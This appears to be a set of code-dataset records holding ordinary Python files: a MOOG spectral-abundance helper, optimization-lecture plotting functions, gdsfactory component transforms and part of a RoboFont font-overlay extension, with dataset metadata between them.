print('lines_in \'' + linelist + '\'')
print('atmosphere ' + str(atmosphere))
print('molecules ' + str(molecules))
print('lines ' + str(lines))
print('flux/int ' + str(flux))
print('damping ' + str(damp))
print('plot ' + str(plot))
print('units ' + str(units))
with open('batch.par', 'wt') as file:
file.write('abfind' + '\n')
file.write('terminal \'x11\'' + '\n')
file.write('standard_out \'moog_out.1\'' + '\n')
file.write('summary_out \'moog_out.2\'' + '\n')
file.write('model_in \'star.mod\'' + '\n')
file.write('lines_in \'' + linelist + '\'' + '\n')
file.write('atmosphere ' + str(atmosphere) + '\n')
file.write('molecules ' + str(molecules) + '\n')
file.write('lines ' + str(lines) + '\n')
file.write('flux/int ' + str(flux) + '\n')
file.write('damping ' + str(damp) + '\n')
file.write('plot ' + str(plot) + '\n')
file.write('units ' + str(units) + '\n')
#Function for creating the solar and stellar linelists
def linelist_create(star_in, sun_in, direc_path):
with open(direc_path + '/linelist_star.txt', 'w') as out_star:
with open(direc_path + '/linelist_sun.txt', 'w') as out_sun:
with open(star_in) as file_star:
with open(sun_in) as file_sun:
line_star = file_star.readline()
out_star.write(line_star) #accounts for comment line in linelist files
line_sun = file_sun.readline()
out_sun.write(line_sun) #accounts for comment line in linelist files
line = file_star.readlines()
line_s = file_sun.readlines()
for line_star in line:
line_star_split = line_star.split()
#if len(line_star_split) < 2: continue
for line_sun in line_s:
line_sun_split = line_sun.split()
#if len(line_sun_split) < 2: continue
if line_star_split[0] == line_sun_split[0] and line_star_split[1] == line_sun_split[1]:
out_star.write(line_star)
out_sun.write(line_sun)
continue
#Reads Moog output files, parsing elements and colums
def read_file(filename):
count = 0
elements = ['Fe I ', 'Fe II ', 'C I ', 'N I ', 'O I ', 'S I', 'K I ', 'Na I ', 'Mg I ', 'Al I ', 'Si I ', 'Ca I ', 'Sc II ', 'Ti I ', 'Ti II ', 'V ', 'Cr I ',
'Mn I ', 'Co I ', 'Ni I ', 'Cu I ', 'Zn I ', 'Ba II ']
dtype = [('wavelength', 'f8'),
('ID', 'f8'),
('EP', 'f8'),
('logGF', 'f8'),
('EWin', 'f8'),
('logRWin', 'f8'),
('abund', 'f8'),
('delavg', 'f8')]
abundances = []
el_found = []
with open(filename) as file:
while True:
count += 1
# Get next line from file
line = file.readline()
# if line is empty end of file is reached
if not line: break
for j, el in enumerate(elements):
species = 'Abundance Results for Species ' + el
if species in line:
new_arr = []
el_found.append(el)
line = file.readline().split()
line = file.readline().split()
while len(line) == 8:
new_arr.append(line)
line = file.readline().rstrip().split()
new_arr = np.array(new_arr)
new_arr = np.core.records.fromarrays(new_arr.T,dtype=dtype)
abundances.append(new_arr)
return el_found, abundances
| #Writing MOOG parameter file for the parameter, abundance, and error calculations.
#The parameter file only needs to be written once, at beginning of the routine, because the output
#files are overwritten with each itereation of the routine, only minimal output data are needed.
#
#The user can choose to have the parameter file written to screen by choosing verbose=True
#The user can choose to have more detailed MOOG output by chooseing the appropriate values for the
#MOOG input parameters.
import numpy as np
def param_file(linelist,atmosphere=0,molecules=1,lines=0,flux=0,damp=0,plot=0,units=0,verbose=False):
if verbose:
print('abfind')
print('terminal \'x11\'')
print('standard_out \'moog_out.1\'')
print('summary_out \'moog_out.2\'')
print('model_in \'star.mod\'')
print('lines_in \'' + linelist + '\'')
print('atmosphere ' + str(atmosphere))
print('molecules ' + str(molecules))
print('lines ' + str(lines))
print('flux/int ' + str(flux))
print('damping ' + str(damp))
print('plot ' + str(plot))
print('units ' + str(units))
with open('batch.par', 'wt') as file:
file.write('abfind' + '\n')
file.write('terminal \'x11\'' + '\n')
file.write('standard_out \'moog_out.1\'' + '\n')
file.write('summary_out \'moog_out.2\'' + '\n')
file.write('model_in \'star.mod\'' + '\n')
file.write('lines_in \'' + linelist + '\'' + '\n')
file.write('atmosphere ' + str(atmosphere) + '\n')
file.write('molecules ' + str(molecules) + '\n')
file.write('lines ' + str(lines) + '\n')
file.write('flux/int ' + str(flux) + '\n')
file.write('damping ' + str(damp) + '\n')
file.write('plot ' + str(plot) + '\n')
file.write('units ' + str(units) + '\n')
#Function for creating the solar and stellar linelists
def linelist_create(star_in, sun_in, direc_path):
with open(direc_path + '/linelist_star.txt', 'w') as out_star:
with open(direc_path + '/linelist_sun.txt', 'w') as out_sun:
with open(star_in) as file_star:
with open(sun_in) as file_sun:
line_star = file_star.readline()
out_star.write(line_star) #accounts for comment line in linelist files
line_sun = file_sun.readline()
out_sun.write(line_sun) #accounts for comment line in linelist files
line = file_star.readlines()
line_s = file_sun.readlines()
for line_star in line:
line_star_split = line_star.split()
#if len(line_star_split) < 2: continue
for line_sun in line_s:
line_sun_split = line_sun.split()
#if len(line_sun_split) < 2: continue
if line_star_split[0] == line_sun_split[0] and line_star_split[1] == line_sun_split[1]:
out_star.write(line_star)
out_sun.write(line_sun)
continue
#Reads Moog output files, parsing elements and colums
def read_file(filename):
count = 0
elements = ['Fe I ', 'Fe II ', 'C I ', 'N I ', 'O I ', 'S I', 'K I ', 'Na I ', 'Mg I ', 'Al I ', 'Si I ', 'Ca I ', 'Sc II ', 'Ti I ', 'Ti II ', 'V ', 'Cr I ',
'Mn I ', 'Co I ', 'Ni I ', 'Cu I ', 'Zn I ', 'Ba II ']
dtype = [('wavelength', 'f8'),
('ID', 'f8'),
('EP', 'f8'),
('logGF', 'f8'),
('EWin', 'f8'),
('logRWin', 'f8'),
('abund', 'f8'),
('delavg', 'f8')]
abundances = []
el_found = []
with open(filename) as file:
while True:
count += 1
# Get next line from file
line = file.readline()
# if line is empty end of file is reached
if not line: break
for j, el in enumerate(elements):
species = 'Abundance Results for Species ' + el
if species in line:
new_arr = []
el_found.append(el)
line = file.readline().split()
line = file.readline().split()
while len(line) == 8:
new_arr.append(line)
line = file.readline().rstrip().split()
new_arr = np.array(new_arr)
new_arr = np.core.records.fromarrays(new_arr.T,dtype=dtype)
abundances.append(new_arr)
return el_found, abundances
| en | 0.793189 | #Writing MOOG parameter file for the parameter, abundance, and error calculations. #The parameter file only needs to be written once, at beginning of the routine, because the output #files are overwritten with each itereation of the routine, only minimal output data are needed. # #The user can choose to have the parameter file written to screen by choosing verbose=True #The user can choose to have more detailed MOOG output by chooseing the appropriate values for the #MOOG input parameters. #Function for creating the solar and stellar linelists #accounts for comment line in linelist files #accounts for comment line in linelist files #if len(line_star_split) < 2: continue #if len(line_sun_split) < 2: continue #Reads Moog output files, parsing elements and colums # Get next line from file # if line is empty end of file is reached | 3.10529 | 3 |
lectures/optimization/optimization_plots.py | carolinalvarez/ose-course-scientific-computing | 0 | 10381 | <reponame>carolinalvarez/ose-course-scientific-computing<filename>lectures/optimization/optimization_plots.py
"""Plots for optimization lecture."""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import cm
def plot_contour(f, allvecs, legend_path):
"""Plot contour graph for function f."""
# Create array from values with at least two dimensions.
allvecs = np.atleast_2d(allvecs)
X, Y, Z = _get_grid(f)
CS = plt.contour(X, Y, Z)
plt.clabel(CS, inline=1, fontsize=10)
plt.title("objective function")
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
plt.rc("text", usetex=False)
plt.rc("font", family="serif")
plt.plot(1, 1, "r*", markersize=10, label="minimum")
plt.plot(4.5, -1.5, "bx", markersize=10, label="initial guess")
plt.plot(
np.array(allvecs)[:, 0], np.array(allvecs)[:, 1], "go", markersize=4, label=legend_path,
)
plt.legend()
return plt
def _get_grid(f):
"""Create a grid for function f."""
# create data to visualize objective function
n = 50 # number of discretization points along the x-axis
m = 50 # number of discretization points along the x-axis
a = -2.0
b = 5.0 # extreme points in the x-axis
c = -2
d = 5.0 # extreme points in the y-axis
X, Y = np.meshgrid(np.linspace(a, b, n), np.linspace(c, d, m))
Z = np.zeros(X.shape)
argument = np.zeros(2)
for i in range(X.shape[0]):
for j in range(X.shape[1]):
argument[0] = X[i, j]
argument[1] = Y[i, j]
Z[i][j] = f(argument)
return X, Y, Z
def plot_surf(f):
"""Plot surface graph of function f."""
X, Y, Z = _get_grid(f)
fig = plt.figure()
ax = fig.gca(projection="3d")
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm)
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
fig.colorbar(surf)
plt.title("objective function")
| """Plots for optimization lecture."""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import cm
def plot_contour(f, allvecs, legend_path):
"""Plot contour graph for function f."""
# Create array from values with at least two dimensions.
allvecs = np.atleast_2d(allvecs)
X, Y, Z = _get_grid(f)
CS = plt.contour(X, Y, Z)
plt.clabel(CS, inline=1, fontsize=10)
plt.title("objective function")
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
plt.rc("text", usetex=False)
plt.rc("font", family="serif")
plt.plot(1, 1, "r*", markersize=10, label="minimum")
plt.plot(4.5, -1.5, "bx", markersize=10, label="initial guess")
plt.plot(
np.array(allvecs)[:, 0], np.array(allvecs)[:, 1], "go", markersize=4, label=legend_path,
)
plt.legend()
return plt
def _get_grid(f):
"""Create a grid for function f."""
# create data to visualize objective function
n = 50 # number of discretization points along the x-axis
m = 50 # number of discretization points along the x-axis
a = -2.0
b = 5.0 # extreme points in the x-axis
c = -2
d = 5.0 # extreme points in the y-axis
X, Y = np.meshgrid(np.linspace(a, b, n), np.linspace(c, d, m))
Z = np.zeros(X.shape)
argument = np.zeros(2)
for i in range(X.shape[0]):
for j in range(X.shape[1]):
argument[0] = X[i, j]
argument[1] = Y[i, j]
Z[i][j] = f(argument)
return X, Y, Z
def plot_surf(f):
"""Plot surface graph of function f."""
X, Y, Z = _get_grid(f)
fig = plt.figure()
ax = fig.gca(projection="3d")
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm)
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
fig.colorbar(surf)
plt.title("objective function") | en | 0.762189 | Plots for optimization lecture. Plot contour graph for function f. # Create array from values with at least two dimensions. Create a grid for function f. # create data to visualize objective function # number of discretization points along the x-axis # number of discretization points along the x-axis # extreme points in the x-axis # extreme points in the y-axis Plot surface graph of function f. # Plot the surface. | 3.718405 | 4 |
gdsfactory/functions.py | simbilod/gdsfactory | 0 | 10382 | <reponame>simbilod/gdsfactory<gh_stars>0
"""All functions return a Component so you can easily pipe or compose them.
There are two types of functions:
- decorators: return the original component
- containers: return a new component
"""
from functools import lru_cache, partial
import numpy as np
from omegaconf import OmegaConf
from pydantic import validate_arguments
from gdsfactory.cell import cell
from gdsfactory.component import Component
from gdsfactory.components.text_rectangular import text_rectangular_multi_layer
from gdsfactory.port import auto_rename_ports
from gdsfactory.types import (
Anchor,
Axis,
ComponentSpec,
Float2,
Layer,
List,
Optional,
Strs,
)
cache = lru_cache(maxsize=None)
def add_port(component: Component, **kwargs) -> Component:
"""Return Component with a new port."""
component.add_port(**kwargs)
return component
@cell
def add_text(
component: ComponentSpec,
text: str = "",
text_offset: Float2 = (0, 0),
text_anchor: Anchor = "cc",
text_factory: ComponentSpec = text_rectangular_multi_layer,
) -> Component:
"""Return component inside a new component with text geometry.
Args:
component: component spec.
text: text string.
text_offset: relative to component anchor. Defaults to center (cc).
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
t = component_new << text_factory(text)
t.move((np.array(text_offset) + getattr(ref.size_info, text_anchor)))
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def add_texts(
components: List[ComponentSpec],
prefix: str = "",
index0: int = 0,
**kwargs,
) -> List[Component]:
"""Return a list of Component with text labels.
Args:
components: list of component specs.
prefix: Optional prefix for the labels.
index0: defaults to 0 (0, for first component, 1 for second ...).
keyword Args:
text_offset: relative to component size info anchor. Defaults to center.
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
return [
add_text(component, text=f"{prefix}{i+index0}", **kwargs)
for i, component in enumerate(components)
]
@cell
def rotate(
component: ComponentSpec, angle: float = 90, recenter: bool = False
) -> Component:
"""Return rotated component inside a new component.
Most times you just need to place a reference and rotate it.
This rotate function just encapsulates the rotated reference into a new component.
Args:
component: spec.
angle: to rotate in degrees.
recenter: recenter component after rotating.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
origin_offset = ref.origin - np.array((ref.xmin, ref.ymin))
ref.rotate(angle)
if recenter:
ref.move(
origin=ref.center,
destination=np.array((ref.xsize / 2, ref.ysize / 2)) - origin_offset,
)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
rotate90 = partial(rotate, angle=90)
rotate90n = partial(rotate, angle=-90)
rotate180 = partial(rotate, angle=180)
@cell
def mirror(
component: ComponentSpec, p1: Float2 = (0, 1), p2: Float2 = (0, 0)
) -> Component:
"""Return new Component with a mirrored reference.
Args:
component: component spec.
p1: first point to define mirror axis.
p2: second point to define mirror axis.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.mirror(p1=p1, p2=p2)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
@cell
def move(
component: Component,
origin=(0, 0),
destination=None,
axis: Optional[Axis] = None,
) -> Component:
"""Return new Component with a moved reference to the original component.
Args:
component: to move.
origin: of component.
destination: Optional x, y.
axis: x or y axis.
"""
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.move(origin=origin, destination=destination, axis=axis)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def move_port_to_zero(component: Component, port_name: str = "o1"):
"""Return a container that contains a reference to the original component.
The new component has port_name in (0, 0).
"""
if port_name not in component.ports:
raise ValueError(
f"port_name = {port_name!r} not in {list(component.ports.keys())}"
)
return move(component, -component.ports[port_name].midpoint)
def update_info(component: Component, **kwargs) -> Component:
"""Return Component with updated info."""
component.info.update(**kwargs)
return component
@validate_arguments
def add_settings_label(
component: Component, layer_label: Layer = (66, 0), settings: Optional[Strs] = None
) -> Component:
"""Add a settings label to a component.
Args:
component: spec.
layer_label: for label.
settings: tuple or list of settings. if None, adds all changed settings.
"""
d = (
{setting: component.get_setting(setting) for setting in settings}
if settings
else component.metadata.changed
)
component.add_label(text=OmegaConf.to_yaml(d), layer=layer_label)
return component
__all__ = (
"add_port",
"add_text",
"add_settings_label",
"auto_rename_ports",
"cache",
"mirror",
"move",
"move_port_to_zero",
"rotate",
"update_info",
)
if __name__ == "__main__":
import gdsfactory as gf
c = gf.components.mmi1x2(
length_mmi=10,
decorator=partial(add_settings_label, settings=["name", "length_mmi"]),
)
# c.show()
cr = rotate(component=c)
cr.show()
# cr = c.rotate()
# cr.pprint()
# cr.show()
# cm = move(c, destination=(20, 20))
# cm.show()
# cm = mirror(c)
# cm.show()
# cm = c.mirror()
# cm.show()
# cm2 = move_port_to_zero(cm)
# cm2.show()
# cm3 = add_text(c, "hi")
# cm3.show()
# cr = rotate(component=c)
# cr.show()
# print(component_rotated)
# component_rotated.pprint
# component_netlist = component.get_netlist()
# component.pprint_netlist()
| """All functions return a Component so you can easily pipe or compose them.
There are two types of functions:
- decorators: return the original component
- containers: return a new component
"""
from functools import lru_cache, partial
import numpy as np
from omegaconf import OmegaConf
from pydantic import validate_arguments
from gdsfactory.cell import cell
from gdsfactory.component import Component
from gdsfactory.components.text_rectangular import text_rectangular_multi_layer
from gdsfactory.port import auto_rename_ports
from gdsfactory.types import (
Anchor,
Axis,
ComponentSpec,
Float2,
Layer,
List,
Optional,
Strs,
)
cache = lru_cache(maxsize=None)
def add_port(component: Component, **kwargs) -> Component:
"""Return Component with a new port."""
component.add_port(**kwargs)
return component
@cell
def add_text(
component: ComponentSpec,
text: str = "",
text_offset: Float2 = (0, 0),
text_anchor: Anchor = "cc",
text_factory: ComponentSpec = text_rectangular_multi_layer,
) -> Component:
"""Return component inside a new component with text geometry.
Args:
component: component spec.
text: text string.
text_offset: relative to component anchor. Defaults to center (cc).
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
t = component_new << text_factory(text)
t.move((np.array(text_offset) + getattr(ref.size_info, text_anchor)))
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def add_texts(
components: List[ComponentSpec],
prefix: str = "",
index0: int = 0,
**kwargs,
) -> List[Component]:
"""Return a list of Component with text labels.
Args:
components: list of component specs.
prefix: Optional prefix for the labels.
index0: defaults to 0 (0, for first component, 1 for second ...).
keyword Args:
text_offset: relative to component size info anchor. Defaults to center.
text_anchor: relative to component (ce cw nc ne nw sc se sw center cc).
text_factory: function to add text labels.
"""
return [
add_text(component, text=f"{prefix}{i+index0}", **kwargs)
for i, component in enumerate(components)
]
@cell
def rotate(
component: ComponentSpec, angle: float = 90, recenter: bool = False
) -> Component:
"""Return rotated component inside a new component.
Most times you just need to place a reference and rotate it.
This rotate function just encapsulates the rotated reference into a new component.
Args:
component: spec.
angle: to rotate in degrees.
recenter: recenter component after rotating.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
origin_offset = ref.origin - np.array((ref.xmin, ref.ymin))
ref.rotate(angle)
if recenter:
ref.move(
origin=ref.center,
destination=np.array((ref.xsize / 2, ref.ysize / 2)) - origin_offset,
)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
rotate90 = partial(rotate, angle=90)
rotate90n = partial(rotate, angle=-90)
rotate180 = partial(rotate, angle=180)
@cell
def mirror(
component: ComponentSpec, p1: Float2 = (0, 1), p2: Float2 = (0, 0)
) -> Component:
"""Return new Component with a mirrored reference.
Args:
component: component spec.
p1: first point to define mirror axis.
p2: second point to define mirror axis.
"""
from gdsfactory.pdk import get_component
component = get_component(component)
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.mirror(p1=p1, p2=p2)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
@cell
def move(
component: Component,
origin=(0, 0),
destination=None,
axis: Optional[Axis] = None,
) -> Component:
"""Return new Component with a moved reference to the original component.
Args:
component: to move.
origin: of component.
destination: Optional x, y.
axis: x or y axis.
"""
component_new = Component()
component_new.component = component
ref = component_new.add_ref(component)
ref.move(origin=origin, destination=destination, axis=axis)
component_new.add_ports(ref.ports)
component_new.copy_child_info(component)
return component_new
def move_port_to_zero(component: Component, port_name: str = "o1"):
"""Return a container that contains a reference to the original component.
The new component has port_name in (0, 0).
"""
if port_name not in component.ports:
raise ValueError(
f"port_name = {port_name!r} not in {list(component.ports.keys())}"
)
return move(component, -component.ports[port_name].midpoint)
def update_info(component: Component, **kwargs) -> Component:
"""Return Component with updated info."""
component.info.update(**kwargs)
return component
@validate_arguments
def add_settings_label(
component: Component, layer_label: Layer = (66, 0), settings: Optional[Strs] = None
) -> Component:
"""Add a settings label to a component.
Args:
component: spec.
layer_label: for label.
settings: tuple or list of settings. if None, adds all changed settings.
"""
d = (
{setting: component.get_setting(setting) for setting in settings}
if settings
else component.metadata.changed
)
component.add_label(text=OmegaConf.to_yaml(d), layer=layer_label)
return component
__all__ = (
"add_port",
"add_text",
"add_settings_label",
"auto_rename_ports",
"cache",
"mirror",
"move",
"move_port_to_zero",
"rotate",
"update_info",
)
if __name__ == "__main__":
import gdsfactory as gf
c = gf.components.mmi1x2(
length_mmi=10,
decorator=partial(add_settings_label, settings=["name", "length_mmi"]),
)
# c.show()
cr = rotate(component=c)
cr.show()
# cr = c.rotate()
# cr.pprint()
# cr.show()
# cm = move(c, destination=(20, 20))
# cm.show()
# cm = mirror(c)
# cm.show()
# cm = c.mirror()
# cm.show()
# cm2 = move_port_to_zero(cm)
# cm2.show()
# cm3 = add_text(c, "hi")
# cm3.show()
# cr = rotate(component=c)
# cr.show()
# print(component_rotated)
# component_rotated.pprint
# component_netlist = component.get_netlist()
# component.pprint_netlist() | en | 0.634079 | All functions return a Component so you can easily pipe or compose them. There are two types of functions: - decorators: return the original component - containers: return a new component Return Component with a new port. Return component inside a new component with text geometry. Args: component: component spec. text: text string. text_offset: relative to component anchor. Defaults to center (cc). text_anchor: relative to component (ce cw nc ne nw sc se sw center cc). text_factory: function to add text labels. Return a list of Component with text labels. Args: components: list of component specs. prefix: Optional prefix for the labels. index0: defaults to 0 (0, for first component, 1 for second ...). keyword Args: text_offset: relative to component size info anchor. Defaults to center. text_anchor: relative to component (ce cw nc ne nw sc se sw center cc). text_factory: function to add text labels. Return rotated component inside a new component. Most times you just need to place a reference and rotate it. This rotate function just encapsulates the rotated reference into a new component. Args: component: spec. angle: to rotate in degrees. recenter: recenter component after rotating. Return new Component with a mirrored reference. Args: component: component spec. p1: first point to define mirror axis. p2: second point to define mirror axis. Return new Component with a moved reference to the original component. Args: component: to move. origin: of component. destination: Optional x, y. axis: x or y axis. Return a container that contains a reference to the original component. The new component has port_name in (0, 0). Return Component with updated info. Add a settings label to a component. Args: component: spec. layer_label: for label. settings: tuple or list of settings. if None, adds all changed settings. # c.show() # cr = c.rotate() # cr.pprint() # cr.show() # cm = move(c, destination=(20, 20)) # cm.show() # cm = mirror(c) # cm.show() # cm = c.mirror() # cm.show() # cm2 = move_port_to_zero(cm) # cm2.show() # cm3 = add_text(c, "hi") # cm3.show() # cr = rotate(component=c) # cr.show() # print(component_rotated) # component_rotated.pprint # component_netlist = component.get_netlist() # component.pprint_netlist() | 3.036531 | 3 |
OverlayUFOs/Overlay UFOs.roboFontExt/lib/OverlayUFOs.py | connordavenport/fbOpenTools | 0 | 10383 | #coding=utf-8
from __future__ import division
"""
# OVERLAY UFOS
For anyone looking in here, sorry the code is so messy. This is a standalone version of a script with a lot of dependencies.
"""
import os
from AppKit import * #@PydevCodeAnalysisIgnore
from vanilla import * #@PydevCodeAnalysisIgnore
from mojo.drawingTools import *
from mojo.events import addObserver, removeObserver
from mojo.extensions import getExtensionDefault, setExtensionDefault, getExtensionDefaultColor, setExtensionDefaultColor
from mojo.UI import UpdateCurrentGlyphView
from fontTools.pens.transformPen import TransformPen
from defconAppKit.windows.baseWindow import BaseWindowController
import unicodedata
#from lib.tools.defaults import getDefaultColor
from lib.tools.drawing import strokePixelPath
from lib.UI.spaceCenter.glyphSequenceEditText import splitText
from builtins import chr
selectedSymbol = u'•'
def SmallTextListCell(editable=False):
cell = NSTextFieldCell.alloc().init()
size = NSSmallControlSize #NSMiniControlSize
cell.setControlSize_(size)
font = NSFont.systemFontOfSize_(NSFont.systemFontSizeForControlSize_(size))
cell.setFont_(font)
cell.setEditable_(editable)
return cell
class TX:
"""
An agnostic way to get a naked font.
"""
@classmethod
def naked(cls, f):
try:
return f.naked()
except:
return f
class Tool():
"""
The tool object manages the font list. This is a simplification.
"""
fonts = AllFonts()
def addObserver(self, target, method, action):
addObserver(target, method, action)
def removeObserver(self, target, method, action):
removeObserver(target, method, action)
def getCurrentFont(self):
return CurrentFont()
def getFonts(self):
u"""Answers the list of selected fonts, ordered by their path.
"""
return self.fonts
def appendToFonts(self, path):
f = OpenFont(path, showUI=False)
self.fonts.append(f)
def removeFromFonts(self, path):
for i, f in enumerate(self.fonts):
if f.path == path:
del self.fonts[i]
def getFontPaths(self):
return [f.path or str(f.info.familyName)+" "+str(f.info.styleName) for f in self.getFonts()]
def getFontLabel(self, path):
if path is None:
return None
if not path:
return 'Untitled'
name = path.split('/')[-1]
status = selectedSymbol
return status, path, name
def getFontLabels(self):
labels = {}
for path in self.getFontPaths():
if path:
label = self.getFontLabel(path)
name = label[-1]
else:
name = 'Untitled'
if not name in labels:
labels[name] = []
labels[name].append(label)
sortedLabels = []
for _, labelSet in sorted(labels.items()):
if len(labelSet) == 1: # There is only a single font with this name
sortedLabels.append(labelSet[0])
else: # Otherwise we'll have to construct new names to show the difference
for status, path, name in sorted(labelSet):
sortedLabels.append((status, path, '%s "%s"' % (name, '/'.join(path.split('/')[:-1]))))
return sortedLabels
class C:
"""
Some constants.
"""
C2 = 100
BUTTON_WIDTH = 80
STYLE_CHECKBOXSIZE = 'small'
STYLE_LABELSIZE = 'small'
STYLE_RADIOSIZE = 'small'
L = 22
LL = 25
class OverlayUFOs(BaseWindowController):
DEFAULTKEY = "com.fontbureau.overlayUFO"
DEFAULTKEY_FILLCOLOR = "%s.fillColor" %DEFAULTKEY
DEFAULTKEY_STROKECOLOR = "%s.strokeColor" %DEFAULTKEY
DEFAULTKEY_STROKE = "%s.stroke" %DEFAULTKEY
DEFAULTKEY_FILL = "%s.fill" %DEFAULTKEY
FALLBACK_FILLCOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .1)
FALLBACK_STROKECOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .5)
VERSION = 1.0
NAME = u'Overlay UFOs'
MANUAL = u"""In the current glyph window, this will present the view the same glyph from a separate
UFO or set of UFOs.<br/>
This does NOT import the UFO into a background layer. Instead, it renders a outline directly from the UFO into the glyph window view.
<ul>
<li>There is no need to import duplicate data into a background layer.</li>
<li>The source outline is always live; when changes are made to the source, they will automatically
appear in the current without re-importing.</li>
<li>The source font does not need to be opened with a UI.</li>
</ul>
<h3>DIALOG</h3>
<ul>
<li>A floating dialog is present to let you open and select source fonts, fill, stroke, color.</li>
<li>Source Fonts: The default source font list is self.getOpenFonts(). The refresh button will
return this list to self.getOpenFonts().</li>
<li>Adding Fonts: You can manually add fonts by selecting a UFO file.
The UFO file will open without an interface.</li>
<li>Removing Fonts: There are buttons for removing selected fonts and for clearing the source font list.</li>
</ul>
<h3>BUGS/IMPROVEMENTS</h3>
<ul>
<li>Known Issue: The source font is drawn on top of the current font, instead of behind it.
So, it is good to select a color with a low opacity.</li>
<li>Known Bug: If the glyph window for both source and current fonts are open, it is possible
to select and inadvertently edit the source outline in the current window. I don't know how to solve this.</li>
<li>Improvement?: Add options to scale the source font.</li>
<li>Improvement?: Set different colors, fill settings for each font?</li>
</ul>
"""
# Fixed width of the window.
VIEWMINSIZE = 400
VIEWSIZE = VIEWMINSIZE
VIEWMAXSIZE = VIEWMINSIZE
WINDOW_POSSIZE = (130, 20, VIEWSIZE, 260)
WINDOW_MINSIZE = (VIEWMINSIZE, 260)
WINDOW_MAXSIZE = (VIEWMAXSIZE, 260)
def getPathListDescriptor(self):
return [
dict(title='Status', key='status', cell=SmallTextListCell(editable=False), width=12, editable=False),
dict(title='Name', key='name', width=300, cell=SmallTextListCell(editable=False), editable=False),
dict(title='Path', key='path', width=0, editable=False),
]
################
# OBSERVERS AND UPDATERS
################
def fontSelectionChanged(self):
self.setSourceFonts()
def activateModule(self):
self.tool.addObserver(self, 'drawInactive', 'drawInactive')
self.tool.addObserver(self, 'drawBackground', 'drawBackground')
self.tool.addObserver(self, 'fontDidOpen', 'fontDidOpen')
self.tool.addObserver(self, 'fontWillClose', 'fontWillClose')
def deactivateModule(self):
removeObserver(self, 'drawBackground')
removeObserver(self, 'drawInactive')
removeObserver(self, 'fontDidOpen')
removeObserver(self, 'fontWillClose')
################
# CONTEXTS
################
def fontDidOpen(self, info):
font = info.get('font')
if font:
self.tool.fonts.append(font)
self.refreshCallback()
def fontWillClose(self, info):
font = info.get('font')
path = font.path
if path:
self.tool.removeFromFonts(path)
self.refreshCallback()
def __init__(self):
self.tool = Tool()
self.w = FloatingWindow((400, 200), "Overlay UFOs", minSize=(400, 200))
self.populateView()
self.getView().open()
def getView(self):
return self.w
def refreshCallback(self, sender=None):
"""
Update the font list.
"""
self.getView().fontList.set(self.getFontItems())
def resetCallback(self, sender=None):
"""
Resets the view to the currently opened fonts.
"""
self.tool.fonts = AllFonts()
self.getView().fontList.set(self.getFontItems())
def addCallback(self, sender=None):
"""
Open a font without UI and add it to the font list.
"""
f = OpenFont(None, showUI=False)
if f is None:
return
self.tool.appendToFonts(f.path)
self.refreshCallback()
def populateView(self):
"""
The UI
"""
self.fillColor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
self.strokeColor = getExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, self.FALLBACK_STROKECOLOR)
self.contextBefore = self.contextAfter = ''
# Populating the view can only happen after the view is attached to the window,
# or else the relative widths go wrong.
view = self.getView()
view.add = Button((-40, 3, 30, 22), '+', callback=self.addCallback)
view.reset = Button((-40, 30, 30, 22), chr(8634), callback=self.resetCallback)
# Flag to see if the selection list click is in progress. We are resetting the selection
# ourselves, using the list "buttons", but changing that selection will cause another
# list update, that should be ignored.
self._selectionChanging = False
# Indicate that we are a drawing module
self._canDraw = True
self.sources = []
x = y = 4
view.fontList = List((C.C2, y, 250, -65), self.getFontItems(),
selectionCallback=self.fontListCallback,
drawFocusRing=False,
enableDelete=False,
allowsMultipleSelection=False,
allowsEmptySelection=True,
drawHorizontalLines=True,
showColumnTitles=False,
columnDescriptions=self.getPathListDescriptor(),
rowHeight=16,
)
view.viewEnabled = CheckBox((x, y, C.BUTTON_WIDTH, 22), "Show",
callback=self.viewCallback, sizeStyle=C.STYLE_CHECKBOXSIZE,
value=True)
y += C.L
view.fill = CheckBox((x, y, 60, 22), "Fill", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "fill"), True),
value = True,
callback=self.fillCallback)
y += C.L
color = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
view.color = ColorWell((x, y, 60, 22),
color=color,
callback=self.colorCallback)
y += C.L + 5
